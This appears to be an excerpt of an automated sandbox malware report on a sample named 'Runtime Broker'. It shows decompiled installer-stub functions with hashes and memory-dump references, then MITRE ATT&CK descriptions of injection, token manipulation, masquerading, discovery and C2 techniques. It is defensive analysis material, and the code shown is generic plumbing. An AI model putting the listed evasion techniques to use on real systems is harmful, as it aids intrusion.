Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D1C(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D1C(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E00406579(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E00406483();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402630
0x0040156d
0x00402b08
0x00402bc5
0x00402bd1

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 6d6c62c04bab17be7bca7ce64f8e3236457cc26e69c7d95cef44091556f8642c
Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
Opcode Fuzzy Hash: 6d6c62c04bab17be7bca7ce64f8e3236457cc26e69c7d95cef44091556f8642c
Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D1C(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D1C(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402D3E(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402D3E();
					_t32 = E00402D3E();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D1C();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D1C(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406483();
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402b08
0x00402b08
0x00402bc5
0x00402bd1

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E11, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E11(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e12
0x00405e1f
0x00405e20
0x00405e2b
0x00405e33
0x00405e33
0x00405e3b

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
lstrcatW.KERNEL32(?,0040A014), ref: 00405E33

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD

Uniqueness

Uniqueness Score: -1.00%

Function 00405F19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F19(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653C(0x425f50, _a4);
				_t21 = E00405EBC(0x425f50);
				if(_t21 != 0) {
					E004067EB(_t21);
					if(( *0x42a27c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040689A();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E5D(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E11();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405f25
0x00405f30
0x00405f34
0x00405f3b
0x00405f47
0x00405f57
0x00405f59
0x00405f71
0x00405f72
0x00405f79
0x00405f7a
0x00000000
0x00000000
0x00405f5d
0x00405f64
0x00405f6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f64
0x00405f7c
0x00000000
0x00405f90
0x00405f49
0x00405f4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f4f
0x00405f36
0x00000000

APIs

Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549

Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405F72
GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 00405F82

Strings

P_B, xrefs: 00405F1F

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405518, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405518(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404ECD();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E4D(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044DE(0x413);
				return 0;
			}

0x0040551c
0x00405526
0x00405542
0x00405564
0x00405567
0x0040556d
0x00405577
0x00405578
0x0040557a
0x00405580
0x00405580
0x0040558a
0x00000000
0x00405598
0x0040554f
0x00405587
0x00405587
0x00000000
0x00405587
0x0040555b
0x0040555d
0x00000000
0x0040555d
0x0040552c
0x00000000
0x00000000
0x00405533
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405547
CallWindowProcW.USER32(?,?,?,?), ref: 00405598

Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0

Strings

, xrefs: 00405528

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59

Uniqueness

Uniqueness Score: -1.00%

Function 00405B25, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B25(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405b2e
0x00405b4e
0x00405b56
0x00405b5b
0x00000000
0x00405b61
0x00405b65

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
CloseHandle.KERNEL32(?), ref: 00405B5B

Strings

Error launching installer, xrefs: 00405B38

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00405E5D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E5D(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405e5e
0x00405e68
0x00405e6b
0x00405e71
0x00405e72
0x00405e73
0x00405e7b
0x00000000
0x00000000
0x00000000
0x00405e7b
0x00405e7d
0x00405e85

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E63
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E73

Strings

C:\Users\user\Desktop, xrefs: 00405E5D

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F97, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F97(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405fa7
0x00405fa9
0x00405fac
0x00405fd8
0x00405fb1
0x00405fba
0x00405fbf
0x00405fca
0x00405fcd
0x00405fe9
0x00405fcf
0x00405fd6
0x00000000
0x00405fd6
0x00405fe2
0x00405fe6
0x00405fe6
0x00405fe0
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBF
CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
